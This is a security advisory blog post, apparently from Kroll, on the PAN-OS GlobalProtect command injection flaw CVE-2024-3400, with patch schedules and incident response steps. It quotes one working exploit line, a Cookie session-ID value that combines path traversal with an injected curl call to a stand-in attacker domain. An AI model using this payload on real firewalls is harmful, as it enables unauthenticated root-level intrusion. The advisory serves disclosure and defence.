Tue, Apr 23, 2024

CVE-2024-3400: Zero-Day Remote Code Execution Vulnerability Exploited to Attack PAN-OS

CVE-2024-3400: Zero-Day Remote Code Execution Vulnerability Exploited to Attack PAN-OS

Note: This vulnerability remains under active exploitation, and Kroll experts are investigating. If further details are uncovered by our team, updates will be made to the Kroll Cyber Risk blog.

A command injection vulnerability, being tracked as CVE-2024-3400, was recently discovered in the GlobalProtect feature of Palo Alto Networks PAN-OS software. This vulnerability has a CVSS score of 10 (Critical) and is actively being exploited in the wild. It impacts versions PAN-OS 120.2, PAN-OS 11.0 and PAN-OS 11.1. If exploited on vulnerable PAN-OS versions and distinct feature configurations, an unauthenticated attacker could execute arbitrary code with root privileges on the firewall.

Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 have been developed and were released on April 14, 2024. Cloud NGFW, Panorama appliances and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.

Kroll is aware of increasing cases of exploitation of this vulnerability in the wild. Palo Alto customers who have not patched their GlobalProtect devices should assume compromise.

On April 16, watchTowr posted a technical breakdown and proof of concept (POC) for the CVE-2024-3400, revealing the trivial nature of exploiting this vulnerability. The issue is caused by allowing arbitrary file writes via a path traversal string and command injection set in the session ID handle, which can be changed by an attacker by editing the Cookie parameter of their request.

Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/hour/[arbitrarystring]`curl${IFS}attackerdomain.com`;

This will create an empty file in the “device_telemetry/hour” directory which is processed hourly, the logging service will action all requests in the directory each hour, and due to a failure to sanitize filenames, will execute the command in the filename, in the example above that is making a request to an attacker domain.

How Kroll is Responding

Kroll alerted clients to the threat on Friday, April 12, 2024. Since then, we have responded to suspected compromises surrounding this vulnerability. To address these concerns, our investigators have developed a standardized incident response approach. This includes:

  • Collection, preservation and analysis of available and relevant log data.
  • As available, collection and review of relevant IOCs from our client.
  • Analysis includes comparison of the client provided data against Palo Alto and Kroll Cyber Threat Intelligence datasets.
  • Provide our client with actionable leads to resolve identified security events (e.g., Level 0, Level 1, Level 2, or Level 3)
  • Work with our client on recommendations regarding containment and remediation.
  • Reach out to Kroll for more information on how our incident response team can support via our 24x7 hotlines or contact form.

Kroll Observations

Kroll has observed active, opportunistic exploitation of CVE-2024-3400 by numerous actors. Due to the ease of exploit and perfect positioning to further intrusions into a network this vulnerability serves as a high priority target for threat actors before the flaws are fixed.

Kroll observations show multiple methods of testing and exploring the vulnerability conducted from a highly geographically distributed range of IP addresses, which are being actively investigated and have been added to the Kroll IOC detection database. We do not see evidence of successful exploitation on patched devices.

Palo Alto provides CLI commands in their FAQ to identify indicators of attempted compromise.

Ongoing Investigation

Security researchers have identified that the path traversal exploit may be related to an open-source web framework “Gorilla”, which does not sanitize SessionIDs correctly, subsequently a fix was submitted to the repo. Kroll has not yet independently verified if this is the case, however the Gorilla library is certainly vulnerable to path traversal. As of April 18, 2024, a CVE has not been assigned. Gorilla is used by hundreds of other projects on GitHub and likely used as part of many other private codebases. Kroll is continuing to analyze the threat that this vulnerability could pose to other popular projects and products.


Below are some key recommendations from Kroll’s cyber threat intelligence (CTI) team:

  • Patch Palo Alto devices to the latest version immediately.
  • Palo Alto customers with a Threat Prevention subscription can block attacks for this vulnerability using Threat IDs 95187, 95189 and 95191 (available in Applications and Threats content version 8836-8695 and later). Please monitor this advisory and new Threat Prevention content updates for additional Threat Prevention IDs around CVE-2024-3400.
  • This issue is fixed in hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and in all later PAN-OS versions. Hotfixes for other commonly deployed maintenance releases will also be made available to address this issue. Please see details below for ETAs regarding the upcoming hotfixes.
  • PAN-OS 10.2:
  • 10.2.9-h1 (Released 4/14/24)
  • 10.2.8-h3 (Released 4/15/24)
  • 10.2.7-h8 (Released 4/15/24)
  • 10.2.6-h3 (Released 4/16/24) 
  • 10.2.5-h6 (Released 4/16/24)
  • 10.2.3-h13 (ETA: 4/17/24)
  • 10.2.1-h2 (ETA: 4/17/24)
  • 10.2.2-h5 (ETA: 4/18/24)
  • 10.2.0-h3 (ETA: 4/18/24)
  • 10.2.4-h16 (ETA: 4/19/24) 
  • PAN-OS 11.0:
  • 11.0.4-h1 (Released 4/14/24)
  • 11.0.3-h10 (Released 4/16/24) 
  • 11.0.2-h4 (Released 4/16/24) 
  • 11.0.1-h4 (ETA: 4/17/24)
  • 11.0.0-h3 (ETA: 4/18/24)
  • PAN-OS 11.1:
  • 11.1.2-h3 (Released 4/14/24) 
  • 11.1.1-h1 (Released 4/16/24) 
  • 11.1.0-h3 (Released 4/16/24)

Cyber Risk

Incident response, digital forensics, breach notification, managed detection services, penetration testing, cyber assessments and advisory.

Cyber Threat Intelligence

Threat intelligence are fueled by frontline incident response intel and elite analysts to effectively hunt and respond to threats.

Digital Risk Protection

Proactively safeguard your organization’s digital assets and accelerate visibility of online threats.

24x7 Incident Response

Kroll is the largest global IR provider with experienced responders who can handle the entire security incident lifecycle.

Kroll Responder MDR

Stop cyberattacks. Kroll Responder managed detection and response is fueled by seasoned IR experts and frontline threat intelligence to deliver unrivaled response.